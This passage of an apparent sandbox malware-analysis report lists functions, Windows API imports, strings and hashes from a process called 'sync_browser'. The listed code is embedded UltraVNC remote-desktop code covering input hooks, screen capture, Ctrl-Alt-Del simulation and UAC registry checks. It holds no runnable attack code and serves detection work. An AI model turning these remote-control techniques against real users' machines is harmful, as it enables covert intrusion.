FreeLibrary.KERNEL32 ref: 00007FF7D596483B
FreeLibrary.KERNEL32 ref: 00007FF7D596484D
SetThreadDesktop.USER32 ref: 00007FF7D5964857
CloseDesktop.USER32 ref: 00007FF7D5964860

Strings

vncdesktopsink.cpp : OOOOOOOOOOOO %i %i, xrefs: 00007FF7D59644EA
vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit, xrefs: 00007FF7D59647C4
vncdesktopsink.cpp : RFB_MOUSE_UPDATE , xrefs: 00007FF7D59646FA
vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation , xrefs: 00007FF7D5963ED1
ChangeWindowMessageFilter, xrefs: 00007FF7D5963F3B
vnchook, xrefs: 00007FF7D596431C
vncdesktopsink.cpp : failed to register window class, xrefs: 00007FF7D5963FFE
CaptureW8, xrefs: 00007FF7D5964461
SetHooks, xrefs: 00007FF7D5964385
vncdesktopsink.cpp : failed to create hook window, xrefs: 00007FF7D5964086
\w8hook64.dll, xrefs: 00007FF7D5964277
StartW8, xrefs: 00007FF7D5964432
vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop , xrefs: 00007FF7D5963F19
vncdesktopsink.cpp : REct3 %i %i %i %i , xrefs: 00007FF7D5964576
vncdesktopsink.cpp : RFB_SCREEN_UPDATE , xrefs: 00007FF7D596455D
vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch, xrefs: 00007FF7D5964866
vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch, xrefs: 00007FF7D596447C
WinVNC desktop sink, xrefs: 00007FF7D5963F92
vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK, xrefs: 00007FF7D5963E88
SetMouseFilterHook, xrefs: 00007FF7D596434F, 00007FF7D59643DB
vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3, xrefs: 00007FF7D5964767
\vnchooks.dll, xrefs: 00007FF7D596419B
StopW8, xrefs: 00007FF7D5964446
vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x, xrefs: 00007FF7D5963EED
vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's, xrefs: 00007FF7D5964144
UnSetHooks, xrefs: 00007FF7D596433B
vncdesktopsink.cpp : InitWindow called, xrefs: 00007FF7D5963E4B
SetKeyboardFilterHook, xrefs: 00007FF7D596436A, 00007FF7D59643F6
vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error , xrefs: 00007FF7D5963E7C
SetHook, xrefs: 00007FF7D59643C0
WinVNC, xrefs: 00007FF7D5964033
\schook64.dll, xrefs: 00007FF7D5964205
vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4, xrefs: 00007FF7D59647A0
UnSetHook, xrefs: 00007FF7D59643AC
user32.dll, xrefs: 00007FF7D5963F2E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
API String ID: 3632263120-2889214834
Opcode ID: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
Instruction ID: a6680d7c37a223299d7713629fe7d9d50725859da7b889c2b5e645a3adee6e30
Opcode Fuzzy Hash: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
Instruction Fuzzy Hash: 48527131A08AA686EB48EF64E854AADB7A8FF88B48FC10537DD4D53654DF3CE544C360

Function 00007FF7D5980650 Relevance: 100.3, APIs: 37, Strings: 20, Instructions: 597COMMON

Download Yara Rule

Strings

Vista and runnning as system -> CAD, xrefs: 00007FF7D59811C2
down, xrefs: 00007FF7D5980A1B
gfff, xrefs: 00007FF7D5980AA3
Vista and runnning as user -> Taskmgr, xrefs: 00007FF7D59811FD
************** DEAD KEY, xrefs: 00007FF7D598069C
taskmgr.exe, xrefs: 00007FF7D5981230
Simulating ALT+%d%d%d, xrefs: 00007FF7D5980BCA
fake %d down, xrefs: 00007FF7D5980DF3, 00007FF7D5980E41, 00007FF7D5980E93
SHORT s %i, xrefs: 00007FF7D59809EC
ignoring unknown keysym %d, xrefs: 00007FF7D598107F
Not Vista and runnning as user -> Taskmgr, xrefs: 00007FF7D5981224
Not Vista and runnning as system, use old method, xrefs: 00007FF7D598120E
Compose dead 0x%x 0x%x, xrefs: 00007FF7D5980728
ignoring unrecognised Latin-1 keysym 0x%x, xrefs: 00007FF7D5980D37
keysym 0x%x, xrefs: 00007FF7D5980676
fake %d up, xrefs: 00007FF7D5980B07, 00007FF7D5980B55, 00007FF7D5980BA0, 00007FF7D5980EF7, 00007FF7D5980F40, 00007FF7D5980F8B
CAD, xrefs: 00007FF7D598118D
Found key, xrefs: 00007FF7D5980A33
latin-1 key: keysym %d(0x%x) vkCode 0x%x down %d capslockOn %d, xrefs: 00007FF7D5980FBE
Composed 0x%x, xrefs: 00007FF7D598098E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID:
String ID: ************** DEAD KEY$ Compose dead 0x%x 0x%x$ Composed 0x%x$ Found key$ SHORT s %i$ Simulating ALT+%d%d%d$ keysym 0x%x$CAD$Not Vista and runnning as system, use old method$Not Vista and runnning as user -> Taskmgr$Vista and runnning as system -> CAD$Vista and runnning as user -> Taskmgr$down$fake %d down$fake %d up$gfff$ignoring unknown keysym %d$ignoring unrecognised Latin-1 keysym 0x%x$latin-1 key: keysym %d(0x%x) vkCode 0x%x down %d capslockOn %d$taskmgr.exe
API String ID: 0-2541672151
Opcode ID: 4de62e545ccc4938766ca3ab5845fa14ab1c878863e4d7865b5c773306dab41b
Instruction ID: 854eafd79686ace50eeee12e99a5cffeef547a3f0fc27dbec8dc2a4fc4980781
Opcode Fuzzy Hash: 4de62e545ccc4938766ca3ab5845fa14ab1c878863e4d7865b5c773306dab41b
Instruction Fuzzy Hash: 50529E61E1869287FB18BB24D810BBEAB61BF80B49FC04437DD4E576A5DF3CA549C360

Function 00007FF7D594A130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D594A176
OpenInputDesktop.USER32 ref: 00007FF7D594A186
GetCurrentThreadId.KERNEL32 ref: 00007FF7D594A1B0
GetThreadDesktop.USER32 ref: 00007FF7D594A1B8
GetUserObjectInformationA.USER32 ref: 00007FF7D594A1E9
SetThreadDesktop.USER32 ref: 00007FF7D594A231
OpenProcess.KERNEL32 ref: 00007FF7D594A2B4
OpenProcessToken.ADVAPI32 ref: 00007FF7D594A2D3
CloseHandle.KERNEL32 ref: 00007FF7D594A2E0
GetModuleFileNameA.KERNEL32 ref: 00007FF7D594A2FA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF7D594A3C9
GetLastError.KERNEL32 ref: 00007FF7D594A3CF
CloseHandle.KERNEL32 ref: 00007FF7D594A3E0
CloseHandle.KERNEL32 ref: 00007FF7D594A3EF
OpenEventA.KERNEL32 ref: 00007FF7D594A420
SetEvent.KERNEL32 ref: 00007FF7D594A439
RegOpenKeyExA.ADVAPI32 ref: 00007FF7D594A46A
RegQueryValueExA.ADVAPI32 ref: 00007FF7D594A4A2
RegCloseKey.ADVAPI32 ref: 00007FF7D594A4AD
OpenEventA.KERNEL32 ref: 00007FF7D594A4D8
SetEvent.KERNEL32 ref: 00007FF7D594A4F1
GetModuleFileNameA.KERNEL32 ref: 00007FF7D594A50B
GetDesktopWindow.USER32 ref: 00007FF7D594A5A4
ShellExecuteA.SHELL32 ref: 00007FF7D594A5CF
InitializeCriticalSection.KERNEL32 ref: 00007FF7D594A627
Sleep.KERNEL32 ref: 00007FF7D594A693
SetThreadDesktop.USER32 ref: 00007FF7D594A6A1
CloseDesktop.USER32 ref: 00007FF7D594A6AF

Strings

EnableLUA, xrefs: 00007FF7D594A496
Ctrl-alt-del require service, no permission, xrefs: 00007FF7D594A5E3
UAC is Disable, make registry changes to allow cad, xrefs: 00007FF7D594A283
Warning, xrefs: 00007FF7D594A27C
vistahook.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF7D594A219
-softwarecadhelper, xrefs: 00007FF7D594A335
vistahook.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF7D594A23B
cad.exe, xrefs: 00007FF7D594A599
open, xrefs: 00007FF7D594A5C8
Global\SessionEventUltraCad, xrefs: 00007FF7D594A414, 00007FF7D594A4CC
Ctrl-alt-del require service, no permission, xrefs: 00007FF7D594A656
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00007FF7D594A45C
Winsta0\Default, xrefs: 00007FF7D594A37A
vistahook.cpp : !GetUserObjectInformation , xrefs: 00007FF7D594A1F3
UltraVNC Warning, xrefs: 00007FF7D594A669
vistahook.cpp : OpenInputdesktop OK, xrefs: 00007FF7D594A1A4
vistahook.cpp : OpenInputdesktop Error , xrefs: 00007FF7D594A19B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 1732492099-311746058
Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
Instruction ID: 396ec2836e5b8d18447996ab8620954335aad3edc6c42fdf9035cd36aeeded83
Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
Instruction Fuzzy Hash: 3FF19E32A08B5287EB14AB25E8446ADB7A5FF84B58FC40237DE5D47AA4DF3CE504C720

Function 00007FF7D59420E0 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 241sleeplibrarysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D5941640: GetVersionExA.KERNEL32 ref: 00007FF7D5941671
Part of subcall function 00007FF7D5941640: GetModuleFileNameA.KERNEL32 ref: 00007FF7D59416B3
Part of subcall function 00007FF7D5941640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5941767
Part of subcall function 00007FF7D5941640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5941790
Part of subcall function 00007FF7D5941640: GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59417CE

OpenEventA.KERNEL32 ref: 00007FF7D5942137
SetEvent.KERNEL32 ref: 00007FF7D5942153
CloseHandle.KERNEL32 ref: 00007FF7D5942160
Sleep.KERNEL32 ref: 00007FF7D594216B
OpenEventA.KERNEL32 ref: 00007FF7D594217F
CreateEventA.KERNEL32 ref: 00007FF7D594219F
CreateEventA.KERNEL32 ref: 00007FF7D59421BA
Sleep.KERNEL32 ref: 00007FF7D59421CC
WaitForMultipleObjects.KERNEL32 ref: 00007FF7D5942211
SetEvent.KERNEL32 ref: 00007FF7D5942255
Sleep.KERNEL32 ref: 00007FF7D5942276
Sleep.KERNEL32 ref: 00007FF7D5942289
GetExitCodeProcess.KERNEL32 ref: 00007FF7D59422A5
Sleep.KERNEL32 ref: 00007FF7D59422BE
Sleep.KERNEL32 ref: 00007FF7D59422CD
WaitForSingleObject.KERNEL32 ref: 00007FF7D59422DF
CloseHandle.KERNEL32 ref: 00007FF7D59422EC
Sleep.KERNEL32 ref: 00007FF7D594230A
Sleep.KERNEL32 ref: 00007FF7D5942319
CloseHandle.KERNEL32 ref: 00007FF7D594232B
CloseHandle.KERNEL32 ref: 00007FF7D594233D
LoadLibraryA.KERNEL32 ref: 00007FF7D594235B
GetProcAddress.KERNEL32 ref: 00007FF7D594236E
GetModuleFileNameA.KERNEL32 ref: 00007FF7D5942392
GetDesktopWindow.USER32 ref: 00007FF7D594241F
ShellExecuteA.SHELL32 ref: 00007FF7D5942448
FreeLibrary.KERNEL32 ref: 00007FF7D594245A
SetEvent.KERNEL32 ref: 00007FF7D5942471
WaitForSingleObject.KERNEL32 ref: 00007FF7D5942492
CloseHandle.KERNEL32 ref: 00007FF7D59424A4
CloseHandle.KERNEL32 ref: 00007FF7D59424B6
CloseHandle.KERNEL32 ref: 00007FF7D59424C8
CloseHandle.KERNEL32 ref: 00007FF7D59424DA

Strings

open, xrefs: 00007FF7D5942431
Global\SessionEventUltraCad, xrefs: 00007FF7D59421A5
Global\SessionEventUltra, xrefs: 00007FF7D5942116, 00007FF7D5942171, 00007FF7D5942191
SendSAS, xrefs: 00007FF7D5942361
cad.exe, xrefs: 00007FF7D5942414
sas.dll, xrefs: 00007FF7D5942354

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
API String ID: 767217470-2348971971
Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
Instruction ID: 90ea60f3d07233164ea40eee1cb141fe13de2f6f8ff31e54abf408ff7c328b47
Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
Instruction Fuzzy Hash: 88C19E21A19A6287FE58ABA5A850A7DABA4FFC4F54FC41137CD5E13694CF3CE845C320

Function 00007FF7D595F980 Relevance: 65.1, APIs: 20, Strings: 17, Instructions: 347libraryloaderwindowCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF7D595FA05
LoadLibraryA.KERNEL32 ref: 00007FF7D595FA1A
GetProcAddress.KERNEL32 ref: 00007FF7D595FA3E
FreeLibrary.KERNEL32 ref: 00007FF7D595FBB2
EnumWindows.USER32 ref: 00007FF7D595FBEF
GetDC.USER32 ref: 00007FF7D595FC4A
CreateCompatibleDC.GDI32 ref: 00007FF7D595FD6A
GetLastError.KERNEL32 ref: 00007FF7D595FD7C
GetDeviceCaps.GDI32 ref: 00007FF7D595FDC4
GetDeviceCaps.GDI32 ref: 00007FF7D595FDFE
CreateCompatibleBitmap.GDI32 ref: 00007FF7D595FE38
GetLastError.KERNEL32 ref: 00007FF7D595FE4A
GetDIBits.GDI32 ref: 00007FF7D595FED6

Strings

vncdesktop.cpp : unable to get display format, xrefs: 00007FF7D595FEE0
DISPLAY, xrefs: 00007FF7D595FB1E
vncdesktop.cpp : created memory bitmap, xrefs: 00007FF7D595FE72
vncdesktop.cpp : unable to get display colour info, xrefs: 00007FF7D595FF33
vncdesktop.cpp : failed to create compatibleDC(%d), xrefs: 00007FF7D595FD82
vncdesktop.cpp : Failed m_rootdc , xrefs: 00007FF7D595FC5C
EnumDisplayDevicesA, xrefs: 00007FF7D595FA2C
vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver, xrefs: 00007FF7D595FDD6
vncdesktop.cpp : got bitmap format, xrefs: 00007FF7D595FF4B
USER32, xrefs: 00007FF7D595FA0B
mv video hook driver2, xrefs: 00007FF7D595FAA8
vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver, xrefs: 00007FF7D595FE0F
vncdesktop.cpp : failed to create memory bitmap(%d), xrefs: 00007FF7D595FE50
vncdesktop.cpp : No driver used , xrefs: 00007FF7D595FBFE
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF7D595FAED
WinVNC, xrefs: 00007FF7D595FDCF, 00007FF7D595FE08
vncdesktop.cpp : bitmap dimensions are %d x %d, xrefs: 00007FF7D595FD4B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
API String ID: 3851920378-1343955350
Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
Instruction ID: 58458782ac67c0f866255c93ad7df84c801b8c65464eeeb023c2756ab08bcb89
Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
Instruction Fuzzy Hash: D7023872A086D286EB14AF64D440AADABA1FF89F58FC84437DE4D5B698DF38D015C730

Function 00007FF7D5948980 Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 264registrythreadlibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D59489B4
GetProcAddress.KERNEL32 ref: 00007FF7D59489D8
EnumDisplaySettingsA.USER32 ref: 00007FF7D5948A24
wprintf.LIBCMT ref: 00007FF7D5948AA8
FreeLibrary.KERNEL32 ref: 00007FF7D5948AB0
wprintf.LIBCMT ref: 00007FF7D5948B21
RegCreateKeyA.ADVAPI32 ref: 00007FF7D5948BE3
RegCreateKeyA.ADVAPI32 ref: 00007FF7D5948C07
RegSetValueExA.ADVAPI32 ref: 00007FF7D5948C41
RegCloseKey.ADVAPI32 ref: 00007FF7D5948C54
RegCloseKey.ADVAPI32 ref: 00007FF7D5948C5F
RegCreateKeyA.ADVAPI32 ref: 00007FF7D5948C93
RegCreateKeyA.ADVAPI32 ref: 00007FF7D5948CB3
RegSetValueExA.ADVAPI32 ref: 00007FF7D5948CED
RegCloseKey.ADVAPI32 ref: 00007FF7D5948D00
RegCloseKey.ADVAPI32 ref: 00007FF7D5948D0B
GetCurrentThreadId.KERNEL32 ref: 00007FF7D5948D72
GetThreadDesktop.USER32 ref: 00007FF7D5948D7A
OpenInputDesktop.USER32 ref: 00007FF7D5948D92
SetThreadDesktop.USER32 ref: 00007FF7D5948DA3
ChangeDisplaySettingsExA.USER32 ref: 00007FF7D5948DC0
ChangeDisplaySettingsExA.USER32 ref: 00007FF7D5948DDA
SetThreadDesktop.USER32 ref: 00007FF7D5948DE8
CloseDesktop.USER32 ref: 00007FF7D5948DFA

Strings

Attach.ToDesktop, xrefs: 00007FF7D5948C1F, 00007FF7D5948CCB
DEVICE0, xrefs: 00007FF7D5948B60
USER32, xrefs: 00007FF7D59489A7
mv video hook driver2, xrefs: 00007FF7D5948A74, 00007FF7D5948A9A
SYSTEM, xrefs: 00007FF7D5948C65
mv2, xrefs: 00007FF7D5948D2C
No '%s' found., xrefs: 00007FF7D5948AA1
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF7D5948B12
\DEVICE, xrefs: 00007FF7D5948B32
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF7D5948BD0
EnumDisplayDevicesA, xrefs: 00007FF7D59489C6
SYSTEM\CurrentControlSet\Hardware Profiles\Current, xrefs: 00007FF7D5948C7D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 4207610217-3713657650
